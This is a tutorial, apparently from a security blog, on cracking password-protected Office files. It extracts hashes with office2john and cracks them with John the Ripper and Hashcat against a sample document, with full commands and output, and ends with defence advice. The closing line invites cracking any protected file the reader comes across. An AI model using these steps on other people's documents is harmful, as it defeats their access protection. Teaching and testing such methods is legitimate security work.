Crack Password-Protected Microsoft Office Files, Including Word Docs & Excel Spreadsheets

Microsoft Office files can be password-protected in order to prevent tampering and ensure data integrity. But password-protected documents from earlier versions of Office are susceptible to having their hashes extracted with a simple program called office2john. Those extracted hashes can then be cracked using John the Ripper and Hashcat.


Extracting the hash from a password-protected Microsoft Office file takes only a few seconds with the office2john tool. While the encryption standard across different Office products fluctuated throughout the years, none of them can stand up to office2john's hash-stealing abilities.
This tool is written in Python and can be run right from the terminal. As for Office compatibility, it's known to work on any password-protected file from Word, Excel, PowerPoint, OneNote, Project, Access, and Outlook that was created using Office 97Office 2000Office XPOffice 2003Office 2007Office 2010, and Office 2013, including the Office for Mac versions. It may not work on newer versions of Office, though, we saved a DOCX in Office 2016 that was labeled as Office 2013.

Install Office2John

To get started, we'll need to download the tool from GitHub since office2john is not included in the standard version of John the Ripper (which should already be installed in your Kali system). This can easily be accomplished with wget.
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/office2john.py
--2019-02-05 14:34:45--  https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/office2john.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.148.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.148.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 131690 (129K) [text/plain]
Saving to: ‘office2john.py’

office2john.py                        100%[=======================================================================>] 128.60K  --.-KB/s    in 0.09s

2019-02-05 14:34:46 (1.45 MB/s) - ‘office2john.py’ saved [131690/131690]

Step 2Make Sure Everything's in the Same Directory

In order to run office2john with Python, we will need to change into the same directory that it was installed into. For most of you, this will be Home by default (just enter cd), but feel free to create a separate directory.
Next, we need an appropriate file to test this on. I am using a simple DOCX file named "dummy.docx" that I created and password-protected with Word 2007. Download it to follow along. The password is "password123" as you'll find out. You can also download documents made with Word 2010 and Word 2016 (that shows up as 2013) to use for more examples. Passwords for those are also "password123."

Step 3Extract the Hash with Office2john

The first thing we need to do is extract the hash of our password-protected Office file. Run the following command and pipe the output into "hash.txt" for later use.
python office2john.py dummy.docx > hash.txt
To verify that the hash was extracted successfully, use the cat command. We can see that the hash I saved corresponds to Microsoft Office 2007. Neat.
cat hash.txt
dummy.docx:$office$*2007*20*128*16*a7c7a4eadc2d90fb22c073c6324b6b49*abc5f80409f5f96f97e184e44aacd0b7*930b0c48a7eb5e13a57af4f3030b48e9402b6870

Step 4Crack the Hash You Just Saved

Like already mentioned, we'll be showing you two ways to crack the hash you just saved from the password-protected Microsoft Office file. Both methods work great, so it's really up to preference.

Option 1Cracking with John

Set the --wordlist flag with the location of your favorite word list. The one that is included with Nmap will do for our purposes here, but for tougher passwords, you may want to go with a more extensive word list.
john --wordlist=/usr/share/wordlists/nmap.lst hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 128/128 SSE2 4x / SHA512 128/128 SSE2 2x AES])
Cost 1 (MS Office version) is 2007 for all loaded hashes
Cost 2 (iteration count) is 50000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
John will start cracking, and depending on the password complexity, will finish when a match is found. Press almost any key to view the current status. When the hash is cracked, a message will be displayed on-screen with the document's password: Since our password was pretty simple, it only took seconds to crack it.
password123      (dummy.docx)
1g 0:00:00:03 DONE (2019-02-05 15:00) 0.2824g/s 415.8p/s 415.8c/s 415.8C/s lacoste..cooldude
Use the "--show" option to display all of the cracked passwords reliably
Session completed
We can also use the --show option to display it, like so:
john --show hash.txt
dummy.docx:password123

1 password hash cracked, 0 left
Now that we know one method of cracking a password-protected Microsoft Office file, let's look at one other way using the powerful tool Hashcat.

Option 2Cracking with Hashcat

We can begin by displaying the help menu (--help) for Hashcat. This will provide us with a wealth of information including usage options, hash modes, and other features. There is a ton of information here, so I won't show the output, but you should dive into it if you really want to know Hashcat.
hashcat --help
From the output, we're just interested in the MS Office hash modes. Near the bottom of the help menu, we will find the MS Office mode options and their corresponding numbers. We know from our hash that this is an Office 2007 file, so locate its number ID of 9400.
9700 | MS Office <= 2003 $0/$1, MD5 + RC4               | Documents
9710 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #1  | Documents
9720 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #2  | Documents
9800 | MS Office <= 2003 $3/$4, SHA1 + RC4              | Documents
9810 | MS Office <= 2003 $3, SHA1 + RC4, collider #1    | Documents
9820 | MS Office <= 2003 $3, SHA1 + RC4, collider #2    | Documents
9400 | MS Office 2007                                   | Documents
9500 | MS Office 2010                                   | Documents
9600 | MS Office 2013                                   | Documents
Now we can set the rest of our options using the following command.
hashcat -a 0 -m 9400 --username -o cracked_pass.txt hash.txt /usr/share/wordlists/nmap.lst
  • The -a flag sets the attack type as the default straight mode of 0.
  • The -m flag specifies the mode we want to use, which we just found.
  • The --username option ignores any usernames in the hash file.
  • We can specify the output file as cracked.txt with the -o flag.
  • And finally, we can pass in hash.txt which contains the hash, and set a word list just like we did earlier.
Hashcat will then begin cracking.
hashcat (v5.1.0) starting...

* Device #2: Not a native Intel OpenCL runtime. Expect massive speed loss.
             You can use --force to override, but do not report related errors.
OpenCL Platform #1: Intel(R) Corporation
========================================
* Device #1: Intel(R) Core(TM) i5 CPU       M 480  @ 2.67GHz, 934/3736 MB allocatable, 4MCU

...
After some time has passed, the status will show as cracked, and we are ready to view the password.
Session..........: hashcat
Status...........: Cracked
Hash.Type........: MS Office 2007
Hash.Target......: $office$*2007*20*128*16*a7c7a4eadc2d90fb22c073c6324...2b6870
Time.Started.....: Tue Feb  5 15:08:00 2019 (4 secs)
Time.Estimated...: Tue Feb  5 15:08:04 2019 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/nmap.lst)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      610 H/s (8.51ms) @ Accel:512 Loops:128 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 2048/5084 (40.28%)
Rejected.........: 0/2048 (0.00%)
Restore.Point....: 0/5084 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:49920-50000
Candidates.#1....: #!comment:  ***********************IMPORTANT NMAP LICENSE TERMS************************ -> Princess

Started: Tue Feb  5 15:07:50 2019
Stopped: Tue Feb  5 15:08:05 2019
Simply cat out the specified output file, and it will show the hash with the plaintext password tacked on the end.
cat cracked_pass.txt
$office$*2007*20*128*16*a7c7a4eadc2d90fb22c073c6324b6b49*abc5f80409f5f96f97e184e44aacd0b7*930b0c48a7eb5e13a57af4f3030b48e9402b6870:password123
Success! Now we know two methods of cracking the hash after extracting it from a password-protected Microsoft Office file with office2john.

How to Defend Against Cracking

When it comes to password cracking of any kind, the best defense technique is to use password best practices. This means using unique passwords that are long and not easily guessable. It helps to utilize a combination of upper and lowercase letters, numbers, and symbols, although recent research has shown that simply using long phrases with high entropy is superior. Even better are long, randomly generated passwords which makes cracking them nearly impossible.
In regards to this specific attack, using Microsoft Office 2016 or 2019 documents or newer may not be effective, since office2john is designed to work on earlier versions of Office. However, as you can see above, Office 2016 may very well spit out a 2013 document without the user even knowing, so it doesn't mean a "new" file can't be cracked. Plus, there are still plenty of older Microsoft Office documents floating around out there, and some organizations continue to use these older versions, making this attack still very feasible today.

Wrapping Up

Today, we learned that password-protected Microsoft Office files are not quite as secure as one would be led to believe. We used a tool called office2john to extract the hash of a DOCX file, and then cracked that hash using John the Ripper and Hashcat. These types of files are still commonly used today, so if you come across one that has a password on it, rest easy knowing that there is a way to crack it.

Comments